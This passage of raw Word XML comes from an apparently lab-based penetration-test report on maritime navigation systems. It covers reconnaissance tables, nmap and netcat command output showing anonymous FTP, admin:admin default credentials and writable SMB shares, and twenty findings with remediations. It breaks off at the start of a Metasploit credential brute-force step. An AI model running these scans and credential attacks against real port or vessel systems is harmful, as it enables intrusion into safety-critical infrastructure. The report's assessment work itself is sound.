                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap --script ftp-anon 172.16.10.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp open ftp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| ftp-anon: Anonymous FTP login ALLOWED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| -rw-r--r--  vessel_manifest_backup.sql  [CRITICAL DATA EXPOSED]</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Default HTTP credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap --script http-default-accounts 172.16.10.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| [+] Credentials found: admin:admin on /vts/admin/</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SMB shares enumeration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap --script smb-enum-shares 172.16.10.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| \\172.16.10.20\IT_Docs  READ/WRITE  [writable share found]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| \\172.16.10.20\Backups  READ access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Reconnaissance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1600"/>
        <w:gridCol w:w="4260"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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6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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Key Intelligence Gathered</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WHOIS Lookup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Passive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whois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IP range 172.16.0.0/16, admin email, name servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DNS Footprinting</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Passive</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nslookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Zone transfer exposed all 24 internal hostnames</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Dorking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Passive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GHDB</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Exposed .env file, admin login, backup directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Shodan</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Passive</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Shodan.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Open Telnet:23, SCADA port 102, default creds</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theHarvester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Passive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theHarvester</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staff emails, 5 subdomains, IP range confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Ping Sweep</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Active</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nmap -sn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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 live hosts in 172.16.10.0/24</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SYN Port Scan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nmap -sS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open ports incl. Telnet, MySQL, Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Version Detection</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Active</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nmap -sV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Apache 2.4.18, MySQL 5.7.32, OpenSSH 6.6.1</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Banner Grabbing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netcat</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PHP/7.0.33, ProFTPD 1.3.5, Ubuntu 16.04 OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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NSE Scripts</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Active</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nmap --script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Anonymous FTP, default creds, writable SMB share</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Tools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rPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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49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Application in This Assessment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Nmap</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Network Scanner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Host discovery, SYN scan, version detection, OS fingerprinting, NSE scripts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Wireshark</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Packet Analyzer</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Capturing AIS traffic, SCADA Modbus data, unencrypted HTTP sessions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Metasploit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Exploitation Framework</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Testing default credentials on Telnet/SSH, remote service exploitation</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Burp Suite</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Web App Tester</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SQL Injection, XSS, IDOR, API authentication bypass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theHarvester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OSINT Tool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 harvesting, subdomain discovery, IP range enumeration</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Shodan</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Passive Scanner</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Identifying exposed services and banners without active scanning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Netcat (nc)</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Banner Grabbing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Reading service banners from HTTP, FTP, SSH, Telnet ports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SDR Tools</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Radio Signal Analysis</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AIS signal interception and GPS spoofing simulation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GHDB</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Passive Dorking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Locating exposed files and login pages via search engine operators</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Findings &amp; Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following 20 vulnerabilities were identified across all assessed Maritime Navigation Systems. Each finding is classified by severity, mapped to a tool, and accompanied by a remediation recommendation.</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1500"/>
        <w:gridCol w:w="860"/>
        <w:gridCol w:w="1060"/>
        <w:gridCol w:w="2780"/>
        <w:gridCol w:w="2780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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15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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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10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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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78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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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AIS Signal Spoofing</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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SDR Tools</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Forged AIS signals hide vessel position or impersonate another ship</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Encrypt AIS + implement digital authentication protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2</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AIS Data Unencrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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AIS transmitted in plaintext over VHF — easily intercepted by anyone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Implement AIS Authentication Protocol + TLS encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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GPS Spoofing</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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SDR Tools</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Fake GPS signals can misdirect vessels to incorrect routes</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Integrate GPS with Inertial Navigation System (INS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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4</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Unmonitored AIS Blackout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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AIS device can be disabled without any authority alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Deploy automatic alert when AIS signal drops unexpectedly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Replay Attack on Nav Signals</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26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Wireshark</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Old navigation signals replayed to manipulate tracking</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Implement Timestamp Validation + Signal Freshness Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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6</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Open Telnet on Port 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Control systems accept unencrypted Telnet — full plaintext exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Replace Telnet with SSH + key-based authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Exposed VTS Dashboard</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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Nmap</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Vessel Traffic Service dashboard publicly accessible via internet</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Restrict to internal network + enforce mandatory VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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8</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No OT/IT Network Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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OT network merged with IT — lateral movement risk is critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Separate OT and IT using Firewall + DMZ architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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9</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Insecure Remote Maintenance</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26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Metasploit</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Remote maintenance lacks encryption and multi-factor auth</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Enforce MFA + Encrypted VPN for all remote sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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10</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Default Router Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Network devices run with factory-default passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Change all defaults immediately + enforce Password Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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SQL Injection — Vessel Registration</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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Burp Suite</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Vessel registration fields vulnerable to SQL injection attacks</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Parameterized Queries + Web Application Firewall (WAF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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12</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IDOR — Cargo Manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Other vessel cargo accessible by modifying request object ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Object-level authorization check on every API request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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XSS — Port Booking System</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26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Burp Suite</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Malicious scripts injectable into port booking form fields</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Input Sanitization + Content Security Policy (CSP) headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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14</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Unauthenticated API Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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API endpoints expose sensitive cargo data without authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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OAuth 2.0 + Rate Limiting on all endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Insecure File Upload</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26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Burp Suite</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Malicious files uploadable through official document forms</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File Type Validation + Antivirus Scanning + Sandboxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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16</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Unsecured Marine IoT Sensors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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IoT sensor devices lack authentication or firmware signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Device Authentication + Firmware Signing policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Unencrypted SCADA Communication</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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Wireshark</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SCADA/Modbus data transmitted unencrypted on internal LAN</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Encrypt Modbus/DNP3 with TLS + Network Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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18</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Outdated Firmware on Buoys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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B8860B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Marine buoy devices run unpatched outdated firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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OTA Firmware Update Policy + Version Control system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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19</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No Audit Logs for Port Access</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26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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No logging or audit trail for port management system access</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Centralized Logging + SIEM solution deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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20</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Sensitive Cargo Data in Plaintext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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27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Cargo data stored unencrypted in the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">AES-256 encryption for all sensitive DB fields + Key Mgmt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Practical Exploitation — Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This section presents step-by-step exploitation evidence for the five most critical vulnerabilities. All tests were performed in an isolated simulated lab environment with full written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Flaw #6 — Open Telnet (Port 23) on VTS Control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Affected Host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172.16.10.20 — VTS-CONTROL-01</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Attack Family</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Authentication + Network (Ch.7)</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Tools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Nmap, Netcat, Metasploit</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CVSS Score</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9.8 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Confirm Open Telnet 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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap -sS -p 23 172.16.10.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">23/tcp open telnet</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nc -v 172.16.10.20 23</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection succeeded!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu 16.04.7 LTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VTS-CONTROL-01 login:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Brute Force Default Credentials (Metasploit)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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
